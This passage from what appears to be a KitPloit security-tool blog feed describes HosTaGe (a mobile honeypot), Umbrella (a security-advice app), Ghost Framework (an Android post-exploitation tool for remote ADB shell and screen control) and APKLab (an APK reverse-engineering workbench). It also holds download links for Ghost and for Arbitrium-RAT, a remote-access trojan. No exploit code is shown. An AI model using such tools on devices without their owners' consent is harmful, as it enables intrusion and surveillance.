</li> </ol> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/BenChaliah/Arbitrium-RAT" rel="nofollow" target="_blank" title="Download Arbitrium-RAT">Download Arbitrium-RAT</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-74871803417259985552021-01-19T08:30:00.010-03:002021-01-19T08:30:03.534-03:00HosTaGe - Low Interaction Mobile Honeypot<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/s730/HosTaGe_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="349" height="640" src="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/w306-h640/HosTaGe_0.png" width="306" /></a></div><p><br /></p><p></p> <p>HosTaGe is a lightweight, low-interaction, portable, and generic <a href="https://www.kitploit.com/search/label/HoneyPot" target="_blank" title="honeypot">honeypot</a> for mobile devices that aims on the detection of malicious, <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> network environments. As most malware propagate over the network via specific protocols, a low-interaction honeypot located at a mobile device can check wireless networks for actively propagating malware. We envision such honeypots running on all kinds of mobile devices, e.g., smartphones and tablets, to provide a quick assessment on the potential security state of a network.</p> <p>HosTaGe emulates the following <a href="https://www.kitploit.com/search/label/Protocols" target="_blank" title="protocols">protocols</a> as of the latest version: AMQP, COAP, ECHO, FTP, HTTP, HTTPS, MySQL, MQTT, MODBUS, S7COMM, SNMP, SIP, SMB, SSH, SMTP and TELNET</p><span><a name='more'></a></span><p><br /></p> <p><strong>Download from Play Store!</strong></p> <p>The stable release of HosTaGe can be installed from Google Play Store. <a href="https://play.google.com/store/apps/details?id=dk.aau.netsec.hostage" rel="nofollow" target="_blank" title="Play Store Link">Play Store Link</a> or, Scan the QR code below from your <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> device.</p><p><br /></p><p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/nRrc2T8_oKM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><p><br /></p> <p><strong>References</strong></p> <p>The <a href="https://www.kitploit.com/search/label/Research" target="_blank" title="research">research</a> behind HosTaGe has been published and presented in a number of scientific and industrial conferences. Below you can find some selected papers:</p> <p>[1] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Mihai Plasoianu, Wulf Pfeiffer, Lars Pandikow, Max Mühlhäuser: This Network is Infected: HosTaGe – a Low-Interaction Honeypot for Mobile Devices. SPSM@CCS 2013:43-48</p> <p>[2] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Max Mühlhäuser: HosTaGe: a Mobile Honeypot for Collaborative Defense. ACM SIN 2014:330-333</p> <p>[3] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Max Mühlhäuser: Did you really hack a nuclear power plant? An industrial control mobile honeypot. IEEE CNS 2015:729-730</p> <p>[4] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Carlos Garcia Cordero, Max Mühlhäuser: Multi-stage Attack Detection and Signature Generation with ICS Honeypots. IEEE/IFIP DISSECT@NOMS 2016:1227-1232</p> <p><strong>Download APK</strong></p> <p><a href="https://github.com/aau-network-security/HosTaGe/releases/download/v2.2.11/HosTaGe-2.2.11.apk" rel="nofollow" target="_blank" title="HosTaGe-v2.2.11.apk">HosTaGe-v2.2.11.apk</a> <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.2.11" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a>(latest)</p> <p>HosTaGe-v2.1.1.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.1.1" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p>HosTaGe-v2.0.0.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.0.0" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p><strong>Wiki</strong></p> <p>The Wiki provides information on getting started and using the app. Wiki for HosTaGe can be found here: <a href="https://github.com/aau-network-security/HosTaGe/wiki/2.-Getting-Started" rel="nofollow" target="_blank" title="Wiki">Wiki</a>.</p> <p><strong>GUI</strong></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/s740/HosTaGe_4_alert.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="740" data-original-width="350" height="640" src="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/w302-h640/HosTaGe_4_alert.gif" width="302" /></a></div><p><br /></p> <p><strong>Original Authors</strong></p> <p><a href="https://mvasiloma.com/" rel="nofollow" target="_blank" title="Emmanouil Vasilomanolakis">Emmanouil Vasilomanolakis</a> - idea, guidance and suggestions during development</p> <p><strong>Contributors</strong></p> <p><a href="https://sastry17.github.io/" rel="nofollow" target="_blank" title="Shreyas Srinivasa">Shreyas Srinivasa</a>, lead developer, Aalborg University and Technische Universität Darmstadt (Github - @sastry17)</p> <p>Eirini Lygerou, GSoC 2020 Developer (Github - @irinil)</p> <p>Mihai Plasoianu, student developer, Technische Universität Darmstadt</p> <p>Wulf Pfeiffer, student developer, Technische Universität Darmstadt</p> <p>Lars Pandikow, student developer, Technische Universität Darmstadt</p> <p><strong>Researchers</strong></p> <p><a href="https://www.kshankar.com/" rel="nofollow" target="_blank" title="Shankar Karuppayah">Shankar Karuppayah</a>, mentoring, developer, Technische Universität Darmstadt</p> <p><a href="https://www.inf.uni-hamburg.de/inst/ab/snp/team/fischer.html" rel="nofollow" target="_blank" title="Mathias Fischer">Mathias Fischer</a>, mentoring, Universität Hamburg</p> <p><a href="https://www.informatik.tu-darmstadt.de/telekooperation/telecooperation_group/staff_1/staff_1_details_23168.en.jsp" rel="nofollow" target="_blank" title="Max Mühlhäuser">Max Mühlhäuser</a>, mentoring, Technische Universität Darmstadt</p> <p>Carlos Garcia Cordero, mentoring, Technische Universität Darmstadt</p> <p>Features of HoneyRJ were inspiration for this project. <a href="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html%5C" rel="nofollow" target="_blank" title="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html\">http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html\</a></p> <p>Encryption for the SSH protocol were taken from Ganymed SSH-2 and slightly modified. <a href="http://code.google.com/p/ganymed-ssh-2/" rel="nofollow" target="_blank" title="http://code.google.com/p/ganymed-ssh-2/">http://code.google.com/p/ganymed-ssh-2/</a></p> <p><strong>GSoC 2020</strong></p> <p>The project was actively developed with participation in Google Summer of Code 2020. More information about GSoC2020 is <a href="https://summerofcode.withgoogle.com/projects/#5293206515744768" rel="nofollow" target="_blank" title="here">here</a></p> <p><strong>HPFeeds</strong></p> <p>To access the hpfeeds from hostage please send an access request to <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="hostage@es.aau.dk">hostage@es.aau.dk</a> with your name and organization. Please note that access to the hpfeeds repository is provided only after an internal review.</p> <p><strong>Contact</strong></p> <p>Please use the Github issues to report any issues or for questions. <a href="https://honeynetpublic.slack.com/archives/CUCJPUE3H" rel="nofollow" target="_blank" title="Slack channel">Slack channel</a>; <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="Email">Email</a></p> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aau-network-security/HosTaGe" rel="nofollow" target="_blank" title="Download HosTaGe">Download HosTaGe</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-29657366558314612012021-01-13T17:30:00.019-03:002021-01-13T17:30:03.539-03:00Umbrella_android - Digital And Physical Security Advice App<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-EhHAeY0R2Ws/X_uthm_p19I/AAAAAAAAU8k/JpxXwqRDChMbIWUoG06CMvOhskDPqqa2ACNcBGAsYHQ/s1383/Umbrella_android_1_howtouse.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1383" height="482" src="https://1.bp.blogspot.com/-EhHAeY0R2Ws/X_uthm_p19I/AAAAAAAAU8k/JpxXwqRDChMbIWUoG06CMvOhskDPqqa2ACNcBGAsYHQ/w640-h482/Umbrella_android_1_howtouse.gif" width="640" /></a></div><p><br /></p> <p>Umbrella is an Android <a href="https://www.kitploit.com/search/label/Mobile%20App" target="_blank" title="mobile app">mobile app</a> developed by <a href="https://www.secfirst.org" rel="nofollow" target="_blank" title="Security First">Security First</a> that provides human rights defenders with the information on what to do in any given security situation and the tools to do it. It allows the user to choose what they want to do, such as: protect data; securely make a call/email; securely access the internet; plan secure travel; protect their office/home; conduct counter-surveillance; or deal with kidnapping, arrest or evacuation. Once a situation is chosen, the app outlines what to do and what tools to use given your circumstances. This is followed by a simple checklist of recommended actions that can be customised, saved and shared securely. Umbrella’s Feed also provides users with an up-to-the-minute account of potential risks in their chosen location.</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Example Usage</b></span><br /> <p>Umbrella is designed for everyone (people looking to increase their security, folks living in high-risk areas, regular travellers, business people, techies, journalists, NGO staff, aid workers, human rights defenders, social workers, environmental activists, etc).</p> <p>However, when we built Umbrella we tried to keep in mind the story of Glen Greenwald and Edward Snowden. Greenwald couldn't communicate with Snowden at the start because he found it cumbersome to set up <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> (he nearly missed one of the biggest stories of the decade because of this!). Also, when he (and Laura Poitras) travelled to Hong Kong - they didn't have much knowledge about how to meet securely with Snowden and detect surveillance. This is a common problem for journalists and activists. Umbrella is designed to solve this problem (and others) by having nearly everything they would have needed to know in one place - in their pocket.</p> <br /><span style="font-size: large;"><b>Main Parts of Umbrella</b></span><br /> <p><strong>Introduction:</strong> This is the part the user sees first. It explains briefly how the app works and the basic terms and conditions.</p> <p><strong>Menu:</strong> The bottom navigation menu is the main way for a user to navigate. It lists the feed, forms, lessons (with tool guides), checklists and account.</p> <p><strong>Feed:</strong> The feed contains security feeds from places like the UN Relief Web and the US Centers for Disease Control. You enter your location (and how often you want to be updated). Every a new update is released (e.g a disease outbreak in your location), the information comes up on the dashboard.</p> <p><strong>Lessons:</strong> Lessons are where users can learn about topics and things that they can do to improve their security. Some of the lessons have different levels (Beginner, Advanced, Expert) depending on your needs, ability, and risk. Each module is broken down into sections. At the end of each module is a list of other resources and further reading.</p> <p><strong>Tool Guides:</strong> These are detailed guides about how to use software and apps mentioned in the lessons.</p> <p><strong>Checklists:</strong> Checklists are quick and easy references to help users implement the advice in the lessons. You can tick them off as you complete each item. Items can be edited. You may also create custom checklists. If you start ticking a checklist, you will then see them on the Checklists page. Checklists can also be shared through other apps such as your email.</p> <p><strong>Forms:</strong> Forms allow a user to quickly fill out and share important information about issues such as their travel plan in a high-risk location or report on a digital/physical security incident.</p> <br /><span style="font-size: large;"><b>Lessons</b></span><br /> <p>The general flow of lessons is presented in order to replicate the typical way that a user works. Protecting their information -> Communicating with other people -> Arranging and travelling to a location -> Doing their operations and work -> Dealing with personal issues that may arise-> Seeking support if something goes wrong.</p> <p><em><strong>These are the lessons currently in Umbrella.</strong></em></p> <br /><b>Access your risk</b><br /> <ul> <li>Security Planning</li> </ul> <br /><b>Information</b><br /> <p>These lessons mostly cover the security of information that is stored on your computers.</p> <ul> <li>Managing information</li> <li>Malware</li> <li>Passwords</li> <li>Protecting Files</li> <li>Safely Deleting</li> <li>Backing Up</li> <li>Protect your workplace</li> <li>Workplace raids</li> </ul> <br /><b>Communications</b><br /> <p>These lessons mostly cover the security of information when it is sent or received.</p> <ul> <li>Mobile Phones</li> <li>Making a call</li> <li>Sending a message</li> <li>Email</li> <li>Censorship</li> <li>Online Privacy</li> <li>Phishing</li> <li>Radios and <a href="https://www.kitploit.com/search/label/Satellite" target="_blank" title="satellite">satellite</a> phones</li> <li>Online abuse</li> </ul> <br /><b>Travel</b><br /> <p>These lessons cover the security of travelling in high-risk areas.</p> <ul> <li>Preparation</li> <li>Borders</li> <li>Vehicles</li> <li>Checkpoints</li> <li>Protective Equipment</li> </ul> <br /><b>Work</b><br /> <p>These lessons include topics that may affect you in your work.</p> <ul> <li>Meetings</li> <li>Being followed</li> <li>Protests</li> <li>Dangerous Assignments</li> <li>Public Assignments</li> <li>Public Communications</li> <li>Whistleblowers</li> </ul> <br /><b>Incident Response</b><br /> <p>These lessons cover how to respond to events.</p> <ul> <li>Arrests</li> <li>Evacuation</li> <li>Kidnapping</li> <li>Sexual Assault</li> <li>Terrorism</li> </ul> <br /><b>Stress</b><br /> <ul> <li>Stress</li> </ul> <br /><b>Emergency Support</b><br /> <p>Explains places to get extra help if you have a problem.</p> <ul> <li>Physical</li> <li>Digital</li> </ul> <br /><b>Tools</b><br /> <p>These are detailed guides about how to use software and apps mentioned in the lessons. These are the tools currently covered in the tool guide.</p> <ul> <li>Messaging <ul> <li>Mailvelope</li> <li>ObscuraCam</li> <li>Pidgin</li> <li>Psiphon</li> <li>Signal for Android</li> <li>Signal for iOS</li> </ul> </li> <li>Encryption <ul> <li>Encrypt your iPhone</li> <li>k9 & Open Keychain</li> <li>KeePasXC</li> </ul> </li> <li>PGP <ul> <li>PGP for Linux</li> <li>PGP for MacOS</li> <li>PGP for Windows</li> </ul> </li> <li>Tor <ul> <li>Orbot & Orfox</li> <li>Tor for MacOS</li> <li>Tor for Linux</li> <li>Tor for Windows</li> </ul> </li> <li>Files <ul> <li>Cobian Backup</li> <li>Recuva</li> <li>VeraCrypt</li> </ul> </li> <li>Other <ul> <li>Android</li> <li>Facebook</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>Glossary</b></span><br /> <p>Contains explanations of the various terms used in the app.</p> <br /><span style="font-size: large;"><b>About</b></span><br /> <p>Explains the licences that we use for and by Umbrella. Also says a big THANKYOU to everyone whose work we built on to make it happen.</p> <br /><span style="font-size: large;"><b>Dashboard Feed Sources</b></span><br /> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PWnX1LxJLRI/X_utp1ZebOI/AAAAAAAAU8o/CxhL6vwYloQaKBdJxu-CPOjLSM97UWtigCNcBGAsYHQ/s1000/Umbrella_android_6_DASHBOARDLOGOS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="750" data-original-width="1000" height="480" src="https://1.bp.blogspot.com/-PWnX1LxJLRI/X_utp1ZebOI/AAAAAAAAU8o/CxhL6vwYloQaKBdJxu-CPOjLSM97UWtigCNcBGAsYHQ/w640-h480/Umbrella_android_6_DASHBOARDLOGOS.png" width="640" /></a></div><p><br /></p> <p>These are the sources that we currently include for <a href="https://www.kitploit.com/search/label/Real-Time" target="_blank" title="real-time">real-time</a> updated security Feeds. For privacy reasons, users never connect directly to these services. We are always looking for more useful sources that will help users keep updated on the move.</p> <ul> <li><a href="http://reliefweb.int" rel="nofollow" target="_blank" title="ReliefWeb / UN">ReliefWeb / UN</a>: excellent physical security updates that amalgamate information from the UN and various NGOs - though not available in every country</li> <li><a href="https://www.gov.uk/government/organisations/foreign-commonwealth-office" rel="nofollow" target="_blank" title="Foreign and Commonwealth Office">Foreign and Commonwealth Office</a>: foreign travel advice, consular help and services abroad and document legislation</li> <li><a href="https://www.cdc.gov" rel="nofollow" target="_blank" title="Centers for Disease Control">Centers for Disease Control</a>: updates on disease and health warnings</li> <li><a href="http://www.gdacs.org" rel="nofollow" target="_blank" title="Global Disaster Alert and Coordination System">Global Disaster Alert and Coordination System</a>: updates on natural disaster issues such as floods, earthquakes and tsunamis</li> <li><a href="https://www.state.gov/travel/" rel="nofollow" target="_blank" title="US State Department Country Warnings">US State Department Country Warnings</a>: updates mainly focused on the security situation for travellers and internationals - available for every country</li> </ul> <br /><span style="font-size: large;"><b>Account</b></span><br /> <p>Navigate to the "Account" from the bottom menu. Here you can:</p> <ul> <li>Modify settings (feed interval, feed location, feed sources, notifications, connections, import data, export data)</li> <li>Enable Mask</li> <li>Set a password</li> <li>Log out</li> </ul> <br /><span style="font-size: large;"><b>Requirements</b></span><br /> <p>You need an Android phone with a minimum version of 4.0.3 (SDK 15 - ICE_CREAM_SANDWICH_MR1)</p> <br /><span style="font-size: large;"><b>Contributing Bug reports</b></span><br /> <p>Unfortunately stuff breaks sometimes. If you are in a hurry and have found a code or content problem then please email it to <a href="mailto:support@secfirst.org" rel="nofollow" target="_blank" title="support@secfirst.org">support@secfirst.org</a>. If you have a little more time we generally try to manage any bugs using GitHub. Please search the existing issues for your bug and create a new one if the issue is not yet tracked.</p> <p><a href="https://github.com/securityfirst/Umbrella_android/issues" rel="nofollow" target="_blank" title="https://github.com/securityfirst/Umbrella_android/issues">https://github.com/securityfirst/Umbrella_android/issues</a></p> <p>If the issue you have identified is a security risk to users, please read the documentation about our responsible disclosure policy here:</p> <p><a href="https://secfirst.org/legal" rel="nofollow" target="_blank" title="https://secfirst.org/legal">https://secfirst.org/legal</a></p> <p>If you wish to contact us via PGP, please drop a mail to <a href="mailto:rory@secfirst.org" rel="nofollow" target="_blank" title="rory@secfirst.org">rory@secfirst.org</a> (2C1D3B4D)</p> <p><a href="https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D" rel="nofollow" target="_blank" title="https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D">https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D</a></p> <p><strong>Contributing Ideas</strong></p> <p>Ideas are powerful things! If you have any about what we could do better or things which you think we should do in the future, please email us at <a href="mailto:info@secfirst.org" rel="nofollow" target="_blank" title="info@secfirst.org">info@secfirst.org</a>.</p> <br /><span style="font-size: large;"><b>Contributing Code</b></span><br /> <p>We have a really big development plan of functionality we want to include in the future and are currently in the process of building a way to manage contributions from the open source community. Until we have that up please drop us a mail at <a href="mailto:info@secfirst.org" rel="nofollow" target="_blank" title="info@secfirst.org">info@secfirst.org</a> if you are interested in contributing a specific part of future code. If there is something you want to help out within the interim, then here is some basic advice:</p> <ol> <li> <p>Fork it!</p> </li> <li> <p>Create your feature branch: git checkout -b my-new-feature</p> </li> <li> <p>Commit your changes: git commit -am 'Add some feature'</p> </li> <li> <p>Push to the branch: git push origin my-new-feature</p> </li> <li> <p>Submit a pull request :D</p> </li> </ol> <p><strong>Build Instructions</strong></p> <p><a href="https://github.com/securityfirst/Umbrella_android/blob/master/BUILD.md" rel="nofollow" target="_blank" title="Build it yourself">Build it yourself</a></p> <br /><b>Contributors</b><br /> <p>Thanks to everyone who has contributed code to Umbrella. It wouldn’t have happened without you.</p> <ul> <li> <p><a href="https://github.com/Coccodrillo" rel="nofollow" target="_blank" title="Rok Biderman – Security First Lead Developer">Rok Biderman – Security First Lead Developer</a></p> </li> <li> <p><a href="https://github.com/VesnaPlanko" rel="nofollow" target="_blank" title="Vesna Planko – Security First Lead UI/UX Designer">Vesna Planko – Security First Lead UI/UX Designer</a></p> </li> <li> <p><a href="https://github.com/klaidliadon" rel="nofollow" target="_blank" title="Alex Guerrieri – Security First Developer">Alex Guerrieri – Security First Developer</a></p> </li> <li> <p><a href="https://github.com/krzd" rel="nofollow" target="_blank" title="Adam Hani Schakaki – Security First Developer">Adam Hani Schakaki – Security First Developer</a></p> </li> </ul> <p><strong>Cryptography Notice</strong></p> <p>This distribution includes cryptographic software. The country in which you currently reside may have <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> on the import, possession, use, and/or re-export to another country, of encryption software. BEFORE using any encryption software, please check your country's laws, regulations and policies concerning the import, possession, or use, and re-export of encryption software, to see if this is permitted.</p> <p>See <a href="http://www.wassenaar.org/" rel="nofollow" target="_blank" title="Digital and Physical Security Advice App (31)"><em>http://www.wassenaar.org/</em></a> for more information.</p> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/securityfirst/Umbrella_android" rel="nofollow" target="_blank" title="Download Umbrella_android">Download Umbrella_android</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-31231887728869368402020-12-16T08:30:00.014-03:002020-12-16T08:30:05.083-03:00Ghost Framework - An Android Post-Exploitation Framework That Exploits The Android Debug Bridge To R emotely Access An Android Device<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZLLlLig8B18/X9btOAFsZCI/AAAAAAAAUpw/4ktMkjJ9VOAEcumizaD-84_wgnx6XGdBQCNcBGAsYHQ/s420/ghost_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="332" height="400" src="https://1.bp.blogspot.com/-ZLLlLig8B18/X9btOAFsZCI/AAAAAAAAUpw/4ktMkjJ9VOAEcumizaD-84_wgnx6XGdBQCNcBGAsYHQ/w316-h400/ghost_1.png" width="316" /></a></div><p><br /></p><span style="font-size: large;"><b>About Ghost Framework</b></span><br /> <pre><code>Ghost Framework is an <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> <a href="https://www.kitploit.com/search/label/Post-Exploitation" target="_blank" title="post-exploitation">post-exploitation</a> framework that <a href="https://www.kitploit.com/search/label/Exploits" target="_blank" title="exploits">exploits</a> the<br />Android Debug Bridge to remotely access an Android device. Ghost Framework<br />gives you the power and convenience of remote Android device administration.</code></pre><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Getting started</b></span><br /> Ghost installation <pre><code>To install <a href="https://www.kitploit.com/search/label/Ghost%20Framework" target="_blank" title="Ghost Framework">Ghost Framework</a> you should<br />execute the following commands.<br /></code></pre> <blockquote> <p>cd ghost</p> </blockquote> <blockquote> <p>chmod +x install.sh</p> </blockquote> <blockquote> <p>./install.sh</p> </blockquote> Ghost uninstallation <pre><code>To uninstall Ghost Framework you should<br />execute the following commands.<br /></code></pre> <blockquote> <p>cd ghost</p> </blockquote> <blockquote> <p>chmod +x uninstall.sh</p> </blockquote> <blockquote> <p>./uninstall.sh</p> </blockquote> <br /><span style="font-size: large;"><b>Ghost Framework execution</b></span><br /> <pre><code>To run Ghost Framework you should <br />execute the following command.<br /></code></pre> <blockquote> <p>ghost</p> </blockquote> <br /><span style="font-size: large;"><b>Why Ghost Framework</b></span><br /> <ul> <li>Simple and clear UX/UI.</li> </ul> <pre><code>Ghost Framework has a simple and clear UX/UI. <br />It is easy to understand and it will be easier <br />for you to master the Ghost Framework.<br /></code></pre> <ul> <li>Device shell access.</li> </ul> <pre><code>Ghost Framework has the ability to access the remote Android <br />device shell without using <a href="https://www.kitploit.com/search/label/OpenSSH" target="_blank" title="OpenSSH">OpenSSH</a> or other protocols.<br /></code></pre> <ul> <li>Controlling device screen</li> </ul> <pre><code>Ghost Framework has the ability to access device screen <br />and control it remotely using mouse and keyboard.<br /></code></pre> <h3 align="center"><br /></h3><span style="font-size: large;"><b>Ghost Framework disclaimer</b></span><br /> <pre><code>Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal.<br />It is the end user's responsibility to obey all applicable local, state, federal, and international laws.<br />Developers assume no liability and are not responsible for any misuse or damage caused by this program.<br /></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/EntySec/ghost" rel="nofollow" target="_blank" title="Download Ghost">Download Ghost</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-64985205740495448092020-12-15T17:30:00.001-03:002020-12-15T17:30:00.205-03:00APKLab - Android Reverse Engineering WorkBench For VS Code<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-14H5yRXc-dw/X9briqJDhJI/AAAAAAAAUpM/xk22hOsYJssez99VOjvhqsb0JqAI_53dACNcBGAsYHQ/s512/APKLab_1_icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="512" height="320" src="https://1.bp.blogspot.com/-14H5yRXc-dw/X9briqJDhJI/AAAAAAAAUpM/xk22hOsYJssez99VOjvhqsb0JqAI_53dACNcBGAsYHQ/s320/APKLab_1_icon.png" /></a></div><h4 align="center"><br /> </h4><p align="center"> APKLab seamlessly integrates the best open-source tools: <a href="https://github.com/ibotpeaches/apktool/" rel="nofollow" target="_blank" title="Apktool">Apktool</a>, <a href="https://github.com/skylot/jadx" rel="nofollow" target="_blank" title="Jadx">Jadx</a>, <a href="https://github.com/patrickfav/uber-apk-signer" rel="nofollow" target="_blank" title="uber-apk-signer">uber-apk-signer</a> and more to the excellent VS Code so you can focus on app <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="analysis">analysis</a> and get it done without leaving the IDE.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Features</b></span><br /> <ul> <li>Decode all the resources from an APK</li> <li>Disassemble the APK to Dalvik <a href="https://www.kitploit.com/search/label/Bytecode" target="_blank" title="bytecode">bytecode</a> aka Smali</li> <li>Decompile the APK to Java source</li> <li>Analyze & Hack effectively with feature-rich VS Code</li> <li>Build an APK from Smali and resources</li> <li>Rebuild an APK in Debug mode for dynamic analysis</li> <li>Sign the APK seamlessly during the build</li> <li>Install the APK directly from VS Code</li> <li>Support for Apktool-style projects (<code>apktool.yml</code>)</li> <li>Support for most <a href="https://www.kitploit.com/search/label/Apktool" target="_blank" title="Apktool">Apktool</a> CLI arguments</li> <li>Android resource frameworks <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="management">management</a> (Coming soon!)</li> <li>Support for user-provided keystore for APK signing</li> <li>Download and configure missing dependencies</li> <li>Excellent Smali language support with <a href="https://marketplace.visualstudio.com/items?itemName=LoyieKing.smalise" rel="nofollow" target="_blank" title="Android Reverse Engineering WorkBench for VS Code (18)"><strong>Smalise</strong></a></li> <li>Supports Linux, Windows, and Mac</li> </ul> <br /><span style="font-size: x-large;"><b>Getting Started</b></span><br /> <br /><span style="font-size: large;"><b>Open APK or Apktool project</b></span><br /> <ul> <li> <p>Open the Command Palette (<kbd>Ctrl</kbd>+<kbd>Shift</kbd>+<kbd>P</kbd>) ➜ <kbd>APKLab: Open an APK</kbd></p> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UhHk7xzwhJ0/X9brtAybXrI/AAAAAAAAUpQ/Y16bNfImvrMFax379MvQmvX-CK3BEcfIwCNcBGAsYHQ/s1075/APKLab_9_decode.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="649" data-original-width="1075" height="386" src="https://1.bp.blogspot.com/-UhHk7xzwhJ0/X9brtAybXrI/AAAAAAAAUpQ/Y16bNfImvrMFax379MvQmvX-CK3BEcfIwCNcBGAsYHQ/w640-h386/APKLab_9_decode.gif" width="640" /></a></div><p><br /></p> </li> <li> <p>Or Just open an existing Apktool project folder</p> </li> </ul> <br /><span style="font-size: large;"><b>ReBuild and Sign APK</b></span><br /> <ul> <li> <p>Right-Click on or inside <code>apktool.yml</code> file ➜ <kbd>APKLab: Rebuild the APK</kbd></p> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-nh7RClR-Tes/X9br0Q0KrsI/AAAAAAAAUpY/uMZrBoDDzWMgFBoopEzBQ0NF6OtP5gHcwCNcBGAsYHQ/s1075/APKLab_10_rebuild.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="649" data-original-width="1075" height="386" src="https://1.bp.blogspot.com/-nh7RClR-Tes/X9br0Q0KrsI/AAAAAAAAUpY/uMZrBoDDzWMgFBoopEzBQ0NF6OtP5gHcwCNcBGAsYHQ/w640-h386/APKLab_10_rebuild.gif" width="640" /></a></div><p><br /></p></li></ul><span style="font-size: large;"><b>Install APK to device</b></span><br /> <ul> <li> <p>Right-Click on <code>.apk</code> file (in <code>dist</code> directory) ➜ <kbd>APKLab: Install the APK</kbd></p> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-iZ9m9dnKyR8/X9br5rV34KI/AAAAAAAAUpc/4SMgufrLFgc1jj8F_R-no3nDde7poVxrQCNcBGAsYHQ/s1075/APKLab_11_install.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="649" data-original-width="1075" height="386" src="https://1.bp.blogspot.com/-iZ9m9dnKyR8/X9br5rV34KI/AAAAAAAAUpc/4SMgufrLFgc1jj8F_R-no3nDde7poVxrQCNcBGAsYHQ/w640-h386/APKLab_11_install.gif" width="640" /></a></div> </li> </ul> <br /><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ul> <li> <p><strong>JDK 8+</strong></p> <blockquote> <p>Run <strong><code>java -version</code></strong> in your Shell, if not found download from <a href="https://adoptopenjdk.net/" rel="nofollow" target="_blank" title="here">here</a>.</p> </blockquote> </li> <li> <p><strong>adb</strong></p> <blockquote> <p>Run <strong><code>adb devices</code></strong> in your Shell, if not found check <a href="https://www.xda-developers.com/install-adb-windows-macos-linux/" rel="nofollow" target="_blank" title="this guide">this guide</a>.</p> 